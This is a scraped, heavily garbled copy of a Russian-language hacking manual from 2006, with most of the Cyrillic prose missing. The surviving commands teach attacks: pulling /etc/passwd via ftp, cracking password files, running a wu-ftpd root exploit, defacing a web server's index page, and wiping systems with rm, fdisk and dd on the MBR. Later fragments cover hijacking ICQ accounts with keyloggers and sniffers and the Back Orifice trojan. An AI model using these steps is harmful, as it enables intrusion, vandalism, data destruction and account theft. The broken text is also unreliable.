Levin M. Haking 1

Post on 08-Apr-2018

<ul><li><p>8/7/2019 Levin M. Haking 1</p><p> 1/112</p><p> :</p><p> 681.3 32.973.26018.2</p><p>363</p><p> ., 2006</p><p> ,2006</p><p> .363 : </p><p>. .: , 2006. 224 .</p><p> .</p><p> 681.3 32.973.26018.2</p><p> 2006</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 2/112</p><p> , .</p><p> , , , .</p><p> , </p><p> (, TCP/IP). .</p><p> ?</p><p> ! </p><p> .</p><p> :</p><p> Linux</p><p> RedHat </p><p> UNIX SlackWare </p><p> UNIX</p><p> FreeBSD , UNIX</p><p> : Linux BSD (FreeBSD,OpenBSD, NetBSD)? .</p><p> . </p><p>, :</p><p> ftp 21</p><p> telnet 23</p><p> smtp 25</p><p> http 80</p><p> pop3 110</p><p>3 4</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 3/112</p><p> .</p><p>, :FTP (21)</p><p>, FTP, , .</p><p> FTP? File Transfer Protocol( ). , FTP , 21 , , .</p><p>TELNET (23)</p><p> , ( ), .</p><p>telnet ? , (!) ( !) .</p><p>SMTP (25)</p><p>, , </p><p> ? , </p><p> . Simple Mail Transfer Protocol .</p><p>HTTP (80)</p><p>Hyper Text Transfer Protocol .</p><p>, , , Internet.</p><p> web, ( ) . , .</p><p> , ! , web .</p><p>POP3 (110)</p><p> MailAgent (, Microsoft Outlook).</p><p> () .</p><p>5 6</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 4/112</p><p> ? , </p><p> UNIX . ( ) UNIX.</p><p> Windows (MUST_DIE), (A, B, C,D) :</p><p>C:\MUST_DIE\die.com</p><p> UNIX /, ( CDROM) (,/cdrom).</p><p> . .</p><p>. </p><p> /etc. () /etc passwd .. /etc/passwd.</p><p> , , , </p><p> , .</p><p>, !</p><p>, IP.</p><p> :tracert ( UNIX traceroute)</p><p>w3.cnn.com</p><p> ( ) IP</p><p> (IP Internet. 195.55.55.55 ( 0255 .. 0255.0255.0255.0255).</p><p> ftp ( </p><p> IP). ? MSDOS PROMPT MSDOS.</p><p> ( ) login. Internet.</p><p> Password.</p><p>7 8</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 5/112</p><p> Internet.</p><p> ( , , ! w3.dos.net IIS</p><p>(Internet Information Server), !</p><p> .</p><p>:</p><p>Directory /home/usr/_ not</p><p>foundLogging in "/"</p><p> , , .</p><p> :</p><p>ftp&gt; ( ) get /etc/passwd</p><p> .? . , find MUST_DIE passwd (). , </p><p>ftp (.. MUST_DIE). , find.</p><p> , . 
, , , !</p><p> , </p><p>! : </p><p> , .</p><p> ?</p><p> IP . , , . , .</p><p> : ? , </p><p>9 10</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 6/112</p><p> Internet. TCP/IP (Transfer ControlProtocol/Internet Protocol) , </p><p> Internet. .</p><p>Internet, IP (, ppp10335.dialup.glasnet.ru). ( ) , . , </p><p> , IP:port ( , 195.34.34.30:21 , FTP zone.ru).</p><p> , , </p><p> 23 ( telnet) ( telnet ip:port. , 23). , . </p><p>/, . , </p><p> , , .</p><p> 23 , , </p><p> . . </p><p> ( ). 273275 , , , , </p><p> : </p><p>, Internet. , . . , .</p><p>11 12</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 7/112</p><p> ( 19). </p><p> , , . </p><p> , .</p><p> (Finger). </p><p> finger , , , .</p><p> , </p><p> ? 1 1024 (wellknown). , services. Windows </p><p>C:\_Windows\SERVICES\. NT C:\WINNT\SYSTEM32\DRIVERS\ETC\SERVICES. /etc/services/</p><p>( , ). , (WWW, mail,FTP, news, telnet). , SMTP </p><p> 25 ,POP3 110 , WWW 80 , FTP 21</p><p> , , </p><p> . ! , ( ) , . </p><p> , , , ( , </p><p> Internet !). </p><p>13 14</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 8/112</p><p> . </p><p> .</p><p> , ? </p><p> , . . , </p><p> sendmail ( wiz debug FTP, ). </p><p> , , .</p><p> Windows </p><p> . </p><p> , Internet. , .</p><p> . , , . . , ++, </p><p> (root) , !!! FTPBounce , , FTP( / / ) , </p><p> . ( ). , </p><p>15 16</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 9/112</p><p> FTP , </p><p> . ( ). , </p><p>( !).</p><p> , ( !), . , </p><p> : NT, VMS UNIX. UNIX BSD, AIX, SCI, Sun OS, Irix () . </p><p> , , NT, UNIX, Sun OS (, ). </p><p> , </p><p> , , .</p><p> . 
, ?</p><p> , </p><p>netstat a ( ) :</p><p>Active Connections</p><p>Proto Local Address</p><p>Foreign Address State</p><p>TCP localhost:1027</p><p>0.0.0.0:0 LISTENINGTCP localhost:135</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:135</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:1026</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:1026</p><p>localhost:1027 ESTABLISHED</p><p>TCP localhost:1027</p><p>localhost:1026 ESTABLISHED</p><p>TCP localhost:137</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:138</p><p>17 18</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 10/112</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:nbsession</p><p>0.0.0.0:0 LISTENING</p><p>UDP localhost:135 *:*UDP localhost:nbname *:*</p><p>UDP localhost:nbdatagram *:*</p><p> . , .</p><p> , Local Address () 135, 137, 138 nbsession ( 139 netstatan, , . </p><p> MicrosoftNetworking LAN ( ). Internet , www.uxx.com, , www.happyhacker.org. ( www.whitehouse.gov). netstat a :</p><p>Active Connections</p><p>Proto Local Address Foreign</p><p>Address State</p><p>TCP localhost:1027</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:1350.0.0.0:0 LISTENING</p><p>TCP localhost:135</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:2508</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:25090.0.0.0:0 LISTENING</p><p>TCP localhost:2510</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:2511</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:2514</p><p>0.0.0.0:0 LISTENINGTCP localhost:1026</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:1026</p><p>localhost:1027 ESTABLISHED</p><p>TCP localhost:1027</p><p>localhost:1026 ESTABLISHEDTCP localhost:137</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:138</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:139</p><p>0.0.0.0:0 LISTENING</p><p>19 20</p></li><li><p>8/7/2019 Levin M. 
Haking 1</p><p> 11/112</p><p>TCP localhost:2508</p><p>zlliks.505.ORG:80 ESTABLISHED</p><p>TCP localhost:2509</p><p>zlliks.505.ORG:80 ESTABLISHEDTCP localhost:2510</p><p>zlliks.505.ORG:80 ESTABLISHED</p><p>TCP localhost:2511</p><p>zlliks.505.ORG:80 ESTABLISHED</p><p>TCP localhost:2514</p><p>whitehouse.gov:telnet ESTABLISHED</p><p> , . , , 4 zllinks.505.ORG 80 whitehouse.gov . , Internet.</p><p> www.happyhacker.org (zlliks.505.ORG). , 1024??? , , , . , </p><p>, </p><p> 1024 . ? , 2508 2511.</p><p> ? Internet () netstat r. :</p><p>Route Table</p><p>Active Routes:</p><p>Network Address Netmask Gateway</p><p>Address Interface Metric</p><p>0.0.0.0 0.0.0.0</p><p>198.59.999.200 198.59.999.200 1</p><p>127.0.0.0 255.0.0.0127.0.0.1 127.0.0.1</p><p>1</p><p>198.59.999.0 255.255.255.0</p><p>198.59.999.200 198.59.999.200 1</p><p>198.59.999.200 255.255.255.255</p><p>127.0.0.1 127.0.0.1</p><p>1</p><p>198.59.999.255 255.255.255.255</p><p>198.59.999.200 198.59.999.200 1</p><p>224.0.0.0 224.0.0.0</p><p>198.59.999.200 198.59.999.200 1</p><p>255.255.255.255 255.255.255.255</p><p>198.59.999.200 0.0.0.0</p><p>21 22</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 12/112</p><p>1</p><p>Active Connections</p><p>Proto Local Address</p><p>Foreign Address StateTCP lovelylady:1093</p><p>mack.foo66.com:smtp ESTABLISHED</p><p>Gateway Address Interface IP ( IP , ). ,</p><p> , 10 , , , ( ) , ( ).</p><p> , Internet . p: . ? . . </p><p> e</p><p>mail UUPC . online</p><p> offline . init init1 \UUPC. login password. . Ho , </p><p>. </p><p> usera , login:. </p><p> . </p><p> , Netscape, SLIP &amp; PPP, , </p><p>y , . , . transmit . , , Windows. </p><p>23 24</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 13/112</p><p>, : </p><p> .pwl. Windows . . , DES. Ho . , </p><p> .pwl , 1,2,3,4 , , .</p><p> ,</p><p> . , . . . , </p><p> . BBS, . ! Ha 100%. login, password. , .</p><p> ,</p><p> . yp ( ) </p><p>. .</p><p> login/passwd, </p><p> . root . Ho . , , . 
</p><p> UNIX:FreeBSD, BSDI, SCO open server, Linux., , NexStep, UnixWare, Solaris,Aix, HPUX, VAXORX5.12. , Xenix. Ho </p><p> , , AT&amp;T UNIX 1971 . UNIX:</p><p>25 26</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 14/112 </p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 15/112</p><p> (daemon) .</p><p> exploit:</p><p> ftp wuftp2.42; wuftp2.60 qpopper proftp . exploit </p><p> openSource ( ), ++.</p><p> UNIX. exploit ( ) UNIX wuftp2.42 ( root):</p><p>#gcc .</p><p>#./a.out </p><p> ( )</p><p> IP , offset , , </p><p>() ( </p><p> 5000 +5000 +100, .. : 5000 4900</p><p>4800 0 100 200 5000).</p><p> , . , , </p><p> (patch) , (bugs) .</p><p> , .</p><p> root?Root </p><p>. Root , root (superuser), , !</p><p> root? root (, , , ).</p><p>29 30</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 16/112</p><p> ? exploit. , </p><p> exploit. ? , C++, , , .</p><p> () exploit remote access ( ), ..</p><p> exploit ( , ) remoteaccess.</p><p> ?</p><p> , ( ), ?</p><p>1. (,).</p><p>2. .</p><p>3. , .</p><p> , . : /etc ( </p><p> ), ftpusers ( BSDI UNIX), default () root 21</p><p>(ftp) . joe ( ) root ftp.</p><p>? root #, (Ctrl+k, </p><p>x).</p><p> ( root):</p><p>#joe /etc/ftpusers</p><p> root #, Ctrl+k, x.</p><p>, , ( ?).</p><p>, root , root </p><p> , ( ) , !</p><p> :</p><p>#ftp ip_address or host_name</p><p>31 32</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 17/112</p><p>login: root</p><p>password: !</p><p> ! </p><p>root ! ( , )</p><p> ? ! exploit! </p><p> :</p><p>login incorrect</p><p> 1 1.000.000 ( ), , () .</p><p> exploit( , root). :</p><p>#passwd</p><p>:</p><p>New unix passwd: </p><p>( ) 12345</p><p>:</p><p>Unix password too weak, please</p><p>retype password:</p><p> ?</p><p> , UNIX MUST_DIE!</p><p> : Abc04k9834z </p><p>? !</p><p>, , ! , </p><p> ! , () ZRHEN.</p><p> 12345 :</p><p>Retype password: </p><p>12345</p><p>, ! FTP.</p><p>#ftp</p><p>ftp&gt;open ip_address or host_name</p><p>( , </p><p>33 34</p></li><li><p>8/7/2019 Levin M. 
Haking 1</p><p> 18/112</p><p> , )</p><p>login: root</p><p>password: 12345</p><p> ! ( , ? WWW !)</p><p> ftp bye:</p><p>ftp&gt;bye</p><p> .</p><p> ftp, ?</p><p> !</p><p> telnet ( 23), .</p><p> exploit </p><p> , :#telnet 127.0.0.1 80</p><p>127.0.0.1 loopback .. ip; 80 HTTP (Hyper</p><p>Text Transfer Protocol) , , :</p><p>we hack you</p><p> , ( , ?).</p><p>, , .. . , !</p><p> ?</p><p> !</p><p> ?</p><p> () </p><p>: , apache ( web). :</p><p>#which apache</p><p>:</p><p>/usr/sbin/apachectl</p><p>35 36</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 19/112</p><p>/usr/local/sbin/apachectl</p><p> , , , , DocumentRoot(httpd.conf). :</p><p>/usr/etc/apache</p><p>/usr/local/etc/apache</p><p> ( ) apache DocumentRott(home_dir) :</p><p>/www</p><p>/home/www</p><p>/usr/local/www</p><p>:</p><p>#cd home_dir home_dir www. index.htm index.html. ?</p><p>:</p><p>#ls full | more</p><p> (www). :</p><p>#rm index.htm (index.html)</p><p> .</p><p>:</p><p>#joe index.htm (index.html)</p><p> ( joe) :</p><p>This site hacked by Vasya</p><p> Ctrl+k, x.</p><p> joe .</p><p> ! UNIX</p><p>, . , Internet:</p><p> Ftpd (ftp daemon) port 21 Telnetd (telnet daemon) port 23 Smtpd (smtp daemon) port 25 Httpd (http daemon) port 80 Pop3d (pop3 daemon) port 110</p><p>37 38</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 20/112</p><p> . ( roota) :</p><p>#killall httpd</p><p> web .</p><p>#killall ftpd</p><p> ftp .</p><p>, :</p><p> ( roota):</p><p>#httpd start ( Linux)</p><p>#apachectl restart ( FreeBSD </p><p> web </p><p>apache)</p><p> ftpd:</p><p>#ftpd ( !)</p><p> . . , ( roota):</p><p>#cd /</p><p>#rm * ( (!) </p><p> )</p><p>#cd /boot</p><p>#rm *</p><p>#cd /bin</p><p>#rm *#cd /sbin</p><p>#rm *</p><p>#cd /usr/bin</p><p>#rm *</p><p>#cd /usr/sbin</p><p>#rm *</p><p> , ( /etc, ).</p><p> , .. rm</p><p> : /bin /sbin /usr/bin /usr/sbin , </p><p> ( rm ). :</p><p>#which rm</p><p>39 40</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 21/112</p><p> , rm. 
.</p><p> ?</p><p> :</p><p>#cd /etc</p><p>#rm *</p><p> !</p><p> :</p><p>#reboot</p><p> ( ) </p><p> , 100%</p><p> ? ( roota):</p><p>#fdisk</p><p> p ( . (, 4), :</p><p>d (enter), 4 (enter)</p><p>d (enter), 3 (enter)</p><p>d (enter), 2 (enter)</p><p>d (enter), 1 (enter)</p><p> w nter.</p><p>! !( !)</p><p> UNIX dd, ( )., . SlackWare:</p><p> :hda1 slack ; hda2 dos ; hdc2</p><p> slack</p><p> ( , DOS, , MBR (Master Boot Record) </p><p> hdc2 (SlackWare). UNIX ? ! ):</p><p>dd /dev/hda /dev/hdc 0 512</p><p> :</p><p> 512 . 512 ?Master Boot Record (MBR). </p><p>41 42</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 22/112</p><p> 512 ( )</p><p> ???</p><p> dd () hda hdc!</p><p> hdc!</p><p> , Ctrl+, dd. dd 20 </p><p> 8 , Internet 2 </p><p> : dd fdisk.</p><p> , ( ).</p><p>99% </p><p> (), () ! ( </p><p> () .</p><p> () ( portscanner):</p><p>#portscanner 55.55.55.55 1 1024</p><p> 55.55.55.55 IP ; 1 </p><p> ;1024 .</p><p> ( n ) ( ):</p><p>21</p><p>2225</p><p>80</p><p>110</p><p> :</p><p>43 44</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 23/112</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 24/112</p><p> Count.dat .</p><p>2. : (, ):</p><p> Count.cgi 755. ..#chmod count.cgi 755</p><p> Count.cgi 777. ..#chmod count.dat 777</p><p> telnet , ftp , ftp, chmod ftp.</p><p> count.cgi:</p><p>#!/usr/bin/perl</p><p>print "Contenttype: text/html\n\n";</p><p>open (file,"count.dat);</p><p>@dat=;</p><p>close (file);</p><p>$dat[0]++;</p><p>open (file,"&gt;count.dat");</p><p>print "$dat[0]\n";</p><p>close (file);</p><p>print " $dat[0]\n";</p><p> count.dat ( 5).</p><p> ! , count.cgi 1.</p><p> CGI </p><p> ( ) .. CGI ! ( ,.. , ), : .</p><p> ( , )</p><p> ( email ). email :</p><p>cat /etc/passwd</p><p>47 48</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 25/112</p><p>cat /etc/master.passwd</p><p>cat /etc/shadow</p><p> (). , , .</p><p> :</p><p>Root:fdkjhgSFDgf:</p><p> ( john the ripper) .: </p><p> .</p><p> , .</p><p> ? , () () .</p><p> , </p><p>, , , .</p><p> , () , () .</p><p> ? () .core.</p><p> ? 
, , , , .</p><p> , realnetworks ( realaudio/realvideo). , </p><p> UIN: Bugs, Crack </p><p>Social Ingineering</p><p> : </p><p> , 49 50</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 26/112</p><p>UIN , </p><p> , . , .</p><p> : Internet </p><p> , . . C:\ . ICQ. UIN 20xxxx 80xxxxx. C:\Program Files\ICQ\UIN number.uin , , e</p><p>mail . , keyboard sniffer , .</p><p>ICQ Low, Medium High. </p><p> . , </p><p> , ICQ. ( , ). UIN , , , reboot, , </p><p>ICQ , keyboard sniffer . .</p><p> , </p><p>: , sniffer .</p><p> , ? , </p><p> ?</p><p> , </p><p>, UIN 51 52</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 27/112</p><p>http://www.icq.com/password/ ICQ</p><p> email .</p><p> UIN </p><p> email.</p><p> . , POP3Password Crack </p><p> . , . , hotmail.com , email , .</p><p> : ICQ 777777.</p><p> UIN! email, vasya@something.com. UIN , 2 . sometihg.com email , . , email </p><p> 777777. , </p><p> : email .</p><p> (: email , web ), web. </p><p>53 54</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 28/112</p><p> vasya@something.com? , </p><p> ( email ) vasya@something.com. . , : </p><p> , . . , , . , 80% , , </p><p> . </p><p> . UIN , email .</p><p> , </p><p> , ICQ 8 . Windows UIN . </p><p>Linux, , , password, ( , </p><p> root ).</p><p> Linux ICQ , UIN </p><p>55 56</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 29/112</p><p> 9, . ?</p><p> UINa. Linux ICQ , .</p><p> ICQ , </p><p>: ICQ email?</p><p>: , ICQ </p><p> ICQhijeck. IP, UINa ICQhijeck spoofed , , .</p><p> .</p><p>, .</p><p>: , . ICQ?</p><p>: . , , ICQsniff , ICQ . , ,</p><p>, . , , , , , , , .</p><p>: ICQhijeck,ICQsniff, keyboard sniffer, TCP/UDP sniffer </p><p>57 58</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 30/112</p><p> , ?</p><p>: </p><p>Private Bug, . , , ICQ, .</p><p> tools ? , , . .</p><p> . , </p><p> , , www.yahoo.com. .</p><p> , </p><p> , UIN ,</p><p> ICQ.</p><p>, , , ICQ </p><p> .</p><p> , ICQ , Windows. ,</p><p> www.icq.com ICQ, . , .</p><p> . web .</p><p> free emeil, freewebhosting . , email, . 
</p><p>59 60</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 31/112</p><p> , , , email </p><p> ICQ .</p><p> , , . </p><p> . </p><p> Internet , , , </p><p>. , </p><p> ICQ , </p><p>. , ICQ ? , </p><p>Internet</p><p> .</p><p> , Nuke 139, http://www.microsoft.com .</p><p> Internet , , Proxy , , http://www.gin.ru. </p><p>:http://www.teamcti.com/pview/PrcView.zip, , </p><p> 61 62</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 32/112</p><p> : RUN Windows 95/98 </p><p> : regedit Windows(For Lamers). HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run. , , Internet ! , !</p><p> , sharin ssl</p><p>, cgi , .</p><p> ()</p><p> ( </p><p>) :</p><p>1. </p><p> , , C++, Visual C++, Delphi, , 16 32 </p><p>( Windows95/98)</p><p>2. , . , . , , .</p><p> 1</p><p> !!! !!! ? , , 2</p><p>, http://www.microsoft.com.</p><p> :</p><p>1. 1632 :</p><p>63 64</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 33/112</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 34/112</p><p> . </p><p> . . , !!! NeoLite,</p><p> :http://www.neoworx.com. .</p><p>2. , , , !!! ! 2 1!</p><p> Back</p><p>Orifice</p><p> BO 4</p><p> . , 4 .:</p><p>BoServ.exe</p><p> .